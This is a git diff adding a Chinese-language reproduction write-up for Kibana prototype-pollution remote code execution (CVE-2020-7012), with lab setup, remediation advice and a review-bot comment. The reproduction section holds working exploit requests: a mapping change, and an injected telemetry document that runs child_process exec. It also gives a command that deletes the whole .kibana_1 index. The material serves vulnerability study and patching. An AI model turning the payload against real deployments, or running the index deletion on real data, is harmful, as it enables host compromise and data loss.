diff --git a/Web应用漏洞/Kibana 7.6.2 upgrade-assistant-telemetry 原型污染导致远程代码执行 CVE-2020-7012.md b/Web应用漏洞/Kibana 7.6.2 upgrade-assistant-telemetry 原型污染导致远程代码执行 CVE-2020-7012.md new file mode 100644 index 0000000..b1851d9 --- /dev/null +++ b/Web应用漏洞/Kibana 7.6.2 upgrade-assistant-telemetry 原型污染导致远程代码执行 CVE-2020-7012.md 
@@ -0,0 +1,161 @@ +# Kibana 7.6.2 upgrade-assistant-telemetry 原型污染导致远程代码执行 CVE-2020-7012 + +## 漏洞描述 + +Kibana 是 Elasticsearch 的开源数据可视化仪表盘工具。 + +Kibana 6.7.0 至 6.8.8 版本以及 7.0.0 至 7.6.2 版本中的 Upgrade Assistant 功能存在原型污染漏洞。具有 Kibana 索引写入权限的认证用户可以插入恶意数据,导致 Kibana 执行任意代码。攻击者可能利用此漏洞以 Kibana 进程的权限在主机系统上执行代码。 + +参考链接: + +- https://hackerone.com/reports/852613 +- https://discuss.elastic.co/t/elastic-stack-6-8-9-and-7-7-0-security-update/235571 +- https://nvd.nist.gov/vuln/detail/CVE-2020-7012 + +## 漏洞影响 + +``` +ElasticSearch Kibana >=6.7.0,<=6.8.8 +ElasticSearch Kibana >=7.0.0,<=7.6.2 +``` + +## 环境搭建 + +Vulhub 启动 Kibana 7.6.2 和 Elasticsearch 7.6.2: + +```shell +docker compose up -d +``` + +环境启动后,访问 `http://your-ip:5601` 即可看到 Kibana 的默认首页。 + +![](images/Kibana%207.6.2%20upgrade-assistant-telemetry%20原型污染导致远程代码执行%20CVE-2020-7012/image-20250311093003031.png) + +## 漏洞复现 + +远程代码执行漏洞发生在 Kibana 从 Elasticsearch 读取带有 `upgrade-assistant-telemetry` 属性的保存对象时。你可以通过直接向 Elasticsearch 发送数据或通过 Kibana 提交查询来利用此漏洞。代码执行将在 Kibana 重启后或数据收集时(具体时间未知)发生。 + +首先进入 Kibana UI 的开发者工具(URL 为 `http://your-ip:5601/app/kibana#/dev_tools/console`),然后发送以下请求来修改 Kibana 映射,以允许自定义的 `upgrade-assistant-telemetry` 文档: + +```json +PUT /.kibana_1/_mappings +{ + "properties": { + "upgrade-assistant-telemetry": { + "properties": { + "constructor": { + "properties": { + "prototype": { + "properties": { + "sourceURL": { + "type": "text", + "fields": { + "keyword": { + "type": "keyword", + "ignore_above": 256 + } + } + } + } + } + } + }, + "features": { + "properties": { + "deprecation_logging": { + "properties": { + "enabled": { + "type": "boolean", + "null_value": true + } + } + } + } + }, + "ui_open": { + "properties": { + "cluster": { + "type": "long", + "null_value": 0 + }, + "indices": { + "type": "long", + "null_value": 0 + }, + "overview": { + "type": "long", + "null_value": 0 + } + } + }, + "ui_reindex": { + "properties": { + "close": { + "type": "long", + "null_value": 0 + }, + "open": { + "type": "long", + 
"null_value": 0 + }, + "start": { + "type": "long", + "null_value": 0 + }, + "stop": { + "type": "long", + "null_value": 0 + } + } + } + } + } + } +} +``` + +![](images/Kibana%207.6.2%20upgrade-assistant-telemetry%20原型污染导致远程代码执行%20CVE-2020-7012/image-20250311103327247.png) + +然后发送第二个请求来注入恶意的 telemetry 文档: + +```json +PUT /.kibana_1/_doc/upgrade-assistant-telemetry:upgrade-assistant-telemetry +{ + "upgrade-assistant-telemetry": { + "ui_open.overview": 1, + "ui_open.cluster": 1, + "ui_open.indices": 1, + "constructor.prototype.sourceURL": "\u2028\u2029\nglobal.process.mainModule.require('child_process').exec('touch /tmp/awesome_poc')" + }, + "type": "upgrade-assistant-telemetry", + "updated_at": "2020-04-17T20:47:40.800Z" +} +``` + +![](images/Kibana%207.6.2%20upgrade-assistant-telemetry%20原型污染导致远程代码执行%20CVE-2020-7012/image-20250311102813742.png) + +最后,你需要等待一段时间让 payload 执行。如果不想等待,可以通过 `docker compose restart kibana` 重启 Kibana 服务器,恶意代码将在服务重启后执行。 + +命令将在服务重启后执行: + +``` +docker compose exec kibana ls -al /tmp +``` + +![](images/Kibana%207.6.2%20upgrade-assistant-telemetry%20原型污染导致远程代码执行%20CVE-2020-7012/image-20250311103144864.png) + +**重要提示:漏洞利用后,Kibana 将崩溃且无法启动。你需要从 ElasticSearch 中删除 `.kibana_1` 索引才能恢复功能。** + +删除 `.kibana_1` 并重启服务: + +``` +docker compose exec elasticsearch curl -XDELETE http://localhost:9200/.kibana_1 +docker compose restart kibana +``` + +## 漏洞修复 + +用户应升级到 Kibana 版本 7.7.0 或 6.8.9。无法升级的用户可按照以下说明禁用升级助手: + +- Kibana 版本 6.7.0 和 6.7.1 可以在 `kibana.yml` 文件中设置 `upgrade_assistant.enabled: false` +- Kibana 版本从 6.7.2 开始,可以在 `kibana.yml` 文件中设置 `xpack.upgrade_assistant.enabled: false` 
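Review bot: the recovery step at the end of the 漏洞复现 section (`docker compose exec elasticsearch curl -XDELETE http://localhost:9200/.kibana_1`) deletes the entire Kibana saved-objects index, which destroys every index pattern, dashboard and visualization stored there, and the text does not warn about that. Since the injected document has a known id, suggest first trying the narrower `DELETE /.kibana_1/_doc/upgrade-assistant-telemetry:upgrade-assistant-telemetry` followed by `docker compose restart kibana`, and presenting index deletion only as a last resort with an explicit data-loss warning (in a lab this is harmless, but readers copy these steps into real environments). Two smaller consistency points in the same hunk: the later command fences (`docker compose exec kibana ls -al /tmp` and the delete/restart block) are untagged while the first one uses ```shell, so tag them the same way; and the 漏洞影响 block spells the product "ElasticSearch" where the rest of the file uses "Elasticsearch".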
diff --git a/Web应用漏洞/images/Kibana 7.6.2 upgrade-assistant-telemetry 原型污染导致远程代码执行 CVE-2020-7012/image-20250311093003031.png b/Web应用漏洞/images/Kibana 7.6.2 upgrade-assistant-telemetry 原型污染导致远程代码执行 CVE-2020-7012/image-20250311093003031.png new file mode 100644 index 0000000..1574e61 Binary files /dev/null and b/Web应用漏洞/images/Kibana 7.6.2 upgrade-assistant-telemetry 原型污染导致远程代码执行 CVE-2020-7012/image-20250311093003031.png differ diff --git a/Web应用漏洞/images/Kibana 7.6.2 upgrade-assistant-telemetry 原型污染导致远程代码执行 CVE-2020-7012/image-20250311102813742.png b/Web应用漏洞/images/Kibana 7.6.2 upgrade-assistant-telemetry 原型污染导致远程代码执行 CVE-2020-7012/image-20250311102813742.png new file mode 100644 index 0000000..a5de384 Binary files /dev/null and b/Web应用漏洞/images/Kibana 7.6.2 upgrade-assistant-telemetry 原型污染导致远程代码执行 CVE-2020-7012/image-20250311102813742.png differ diff --git a/Web应用漏洞/images/Kibana 7.6.2 upgrade-assistant-telemetry 原型污染导致远程代码执行 CVE-2020-7012/image-20250311103144864.png b/Web应用漏洞/images/Kibana 7.6.2 upgrade-assistant-telemetry 原型污染导致远程代码执行 CVE-2020-7012/image-20250311103144864.png new file mode 100644 index 0000000..b1dee32 Binary files /dev/null and b/Web应用漏洞/images/Kibana 7.6.2 upgrade-assistant-telemetry 原型污染导致远程代码执行 CVE-2020-7012/image-20250311103144864.png differ diff --git a/Web应用漏洞/images/Kibana 7.6.2 upgrade-assistant-telemetry 原型污染导致远程代码执行 CVE-2020-7012/image-20250311103327247.png b/Web应用漏洞/images/Kibana 7.6.2 upgrade-assistant-telemetry 原型污染导致远程代码执行 CVE-2020-7012/image-20250311103327247.png new file mode 100644 index 0000000..bf37b29 Binary files /dev/null and b/Web应用漏洞/images/Kibana 7.6.2 upgrade-assistant-telemetry 原型污染导致远程代码执行 CVE-2020-7012/image-20250311103327247.png differ